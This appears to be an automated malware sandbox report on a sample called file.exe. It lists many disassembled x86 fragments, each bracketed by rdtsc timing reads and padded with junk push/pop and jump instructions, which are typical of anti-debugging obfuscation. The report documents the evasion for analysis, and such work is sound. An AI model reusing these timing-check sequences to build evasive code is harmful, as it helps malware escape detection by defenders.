Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68DA6 second address: C68DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68DBB second address: C68DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F6268DAF3C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68DD6 second address: C68DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jne 00007F626941E95Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F626941E956h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68323 second address: C6835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007F6268DAF3C6h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F6268DAF3DFh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ecx 0x00000019 pushad 0x0000001a ja 00007F6268DAF3C6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACAB4 second address: CACAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACAB9 second address: CACAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD088 second address: CAD08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD08C second address: CAD097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD097 second address: CAD0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F626941E962h 0x00000013 jmp 00007F626941E965h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jne 00007F626941E956h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD0D9 second address: CAD115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D6h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F6268DAF3C6h 0x00000011 jmp 00007F6268DAF3D3h 0x00000016 jg 00007F6268DAF3C6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD115 second address: CAD11F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD277 second address: CAD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD27B second address: CAD299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F626941E964h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD299 second address: CAD29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD29D second address: CAD2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F626941E956h 0x0000000e jmp 00007F626941E95Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD2B9 second address: CAD2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD43A second address: CAD441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD441 second address: CAD446 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF9DA second address: CAF9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAF9E5 second address: CAF9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2333 second address: CB2337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2337 second address: CB235D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 jl 00007F6268DAF3C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F6268DAF3C6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB25CC second address: CB25E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F626941E963h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6760 second address: CB6768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6768 second address: CB676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5F0A second address: CB5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5F10 second address: CB5F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5F16 second address: CB5F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB5F2F second address: CB5F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6162 second address: CB6172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F6268DAF3CBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB98A5 second address: CB98AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9BC2 second address: CB9BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9BC6 second address: CB9BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9D41 second address: CB9D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9D45 second address: CB9D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F626941E956h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA007 second address: CBA029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jns 00007F6268DAF3D2h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA184 second address: CBA197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F626941E956h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA197 second address: CBA19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0A17 second address: CC0A1D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF695 second address: CBF69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF69B second address: CBF6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF6A0 second address: CBF6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D3h 0x00000009 jmp 00007F6268DAF3CAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF6C1 second address: CBF6E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F626941E95Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBF6E5 second address: CBF705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6268DAF3D8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBFB1A second address: CBFB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E963h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBFB31 second address: CBFB37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68929 second address: C689A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb ecx, 551ABDFCh 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F626941E958h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F626941E966h 0x00000034 push esi 0x00000035 mov edi, 339E95D7h 0x0000003a pop edi 0x0000003b pop ecx 0x0000003c nop 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F626941E969h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6974 second address: CC69C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jng 00007F6268DAF3C6h 0x0000000c pop edx 0x0000000d jmp 00007F6268DAF3CEh 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F6268DAF3D2h 0x00000019 jbe 00007F6268DAF3CCh 0x0000001f jmp 00007F6268DAF3CFh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6C4A second address: CC6C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626941E956h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6C58 second address: CC6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3D5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC77F0 second address: CC7804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F626941E958h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7804 second address: CC780A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8044 second address: CC8078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F626941E956h 0x00000009 jmp 00007F626941E95Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E968h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8078 second address: CC807C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8350 second address: CC8356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8356 second address: CC8363 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCCF44 second address: CCCF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD38A4 second address: CD38C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6268DAF3D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD38C3 second address: CD38C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD29CE second address: CD29D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD29D4 second address: CD29DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3109 second address: CD3117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007F6268DAF3C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD324E second address: CD3252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3252 second address: CD326C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F6268DAF3CCh 0x00000010 jo 00007F6268DAF3C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD326C second address: CD328A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 jmp 00007F626941E95Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD33F0 second address: CD33F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD33F6 second address: CD3425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F626941E95Dh 0x0000000c pop edi 0x0000000d jmp 00007F626941E964h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3425 second address: CD343B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6268DAF3CFh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3588 second address: CD35AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626941E969h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDAEDD second address: CDAEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDAEE1 second address: CDAEEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB352 second address: CDB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB357 second address: CDB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB376 second address: CDB37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB37A second address: CDB37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB37E second address: CDB384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB384 second address: CDB392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB392 second address: CDB3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D0h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB521 second address: CDB53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB928 second address: CDB934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F6268DAF3C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC9A3 second address: CDC9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC9AB second address: CDC9B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6268DAF3C6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC9B8 second address: CDC9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F626941E956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC9C6 second address: CDC9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F6268DAF3D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC9D6 second address: CDC9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE27DE second address: CE27E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE27E2 second address: CE27E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE27E6 second address: CE27F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6268DAF3CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE27F4 second address: CE27F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE21A6 second address: CE21B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F6268DAF3D8h 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2346 second address: CE234B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE234B second address: CE236C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D9h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE24EC second address: CE24F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE24F0 second address: CE24FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE24FC second address: CE2517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E967h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2517 second address: CE2537 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F6268DAF3CCh 0x00000012 jno 00007F6268DAF3C6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
